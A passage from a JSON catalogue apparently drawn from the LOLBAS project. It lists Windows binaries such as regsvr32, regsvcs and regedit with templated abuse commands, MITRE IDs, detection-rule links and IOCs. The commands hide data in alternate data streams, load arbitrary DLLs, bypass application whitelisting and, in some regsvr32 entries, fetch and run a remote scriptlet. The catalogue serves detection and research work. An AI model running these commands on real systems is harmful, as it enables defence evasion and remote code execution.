whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml"},{"type":"IOC","value":"regasm.exe executing dll file"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regasm/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regedit-exe:0","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit /E {PATH_ABSOLUTE}:regfile.reg HKEY_CURRENT_USER\\MyCustomRegKey","description":"Export the target Registry key to the specified .REG file.","usecase":"Hide registry data in alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regedit-exe:1","toolId":"lolbas:regedit-exe","toolName":"Regedit.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regedit {PATH_ABSOLUTE}:regfile.reg","description":"Import the target .REG file into the Registry.","usecase":"Import hidden registry data from alternate data stream","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\regedit.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml"},{"type":"IOC","value":"regedit.exe reading and writing to alternate data stream"},{"type":"IOC","value":"regedit.exe should normally not be executed by end-users"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regedit/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regini-exe:0","toolId":"lolbas:regini-exe","toolName":"Regini.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"regini.exe {PATH}:hidden.ini","description":"Write registry keys from data inside the Alternate data stream.","usecase":"Write to registry","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regini.exe","C:\\Windows\\SysWOW64\\regini.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml"},{"type":"IOC","value":"regini.exe reading from ADS"}],"references":["https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f","https://lolbas-project.github.io/lolbas/Binaries/Regini/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:register-cimprovider-exe:0","toolId":"lolbas:register-cimprovider-exe","toolName":"Register-cimprovider.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Register-cimprovider -path {PATH_ABSOLUTE:.dll}","description":"Load the target .DLL.","usecase":"Execute code within dll file","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Register-cimprovider.exe","C:\\Windows\\SysWOW64\\Register-cimprovider.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml"},{"type":"IOC","value":"Register-cimprovider.exe execution and cmdline DLL load may be supsicious"}],"references":["https://twitter.com/PhilipTsukerman/status/992021361106268161","https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvcs-exe:0","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvcs-exe:1","toolId":"lolbas:regsvcs-exe","toolName":"Regsvcs.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvcs.exe {PATH:.dll}","description":"Loads the target .NET DLL file and executes the RegisterClass function.","usecase":"Execute dll file and bypass Application whitelisting","mitre":["T1218.009"],"privilege":"admin","fullPath":["C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\RegSvcs.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml"}],"references":["https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvcs/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:0","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:1","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"AWL Bypass","source":"LOLBAS","platform":["Windows"],"capability":["AWL / Policy Bypass"],"nativeCategory":["AWL Bypass"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:2","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll","description":"Execute the specified remote .SCT script with scrobj.dll.","usecase":"Execute code from remote scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:3","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll","description":"Execute the specified local .SCT script with scrobj.dll.","usecase":"Execute code from scriptlet, bypass Application whitelisting","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:4","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:regsvr32-exe:5","toolId":"lolbas:regsvr32-exe","toolName":"Regsvr32.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"regsvr32.exe /u /s {PATH:.dll}","description":"Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`.","usecase":"Execute DLL file","mitre":["T1218.010"],"privilege":"user","fullPath":["C:\\Windows\\System32\\regsvr32.exe","C:\\Windows\\SysWOW64\\regsvr32.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml"},{"type":"IOC","value":"regsvr32.exe retrieving files from Internet"},{"type":"IOC","value":"regsvr32.exe executing scriptlet (sct) files"},{"type":"IOC","value":"DotNet CLR libraries loaded into regsvr32.exe"},{"type":"IOC","value":"DotNet CLR Usage Log - regsvr32.exe.log"}],"references":["https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/","https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md","https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/"],"requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"lolbas:replace-exe:0","toolId":"lolbas:replace-exe","toolName":"Replace.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"replace.exe {PATH_ABSOLUTE:.cab} {PATH_ABSOLUTE:folder} /A","description":"Copy .cab file to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\replace.exe","C:\\Windows\\SysWOW64\\replace.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"Replace.exe retrieving files from remote 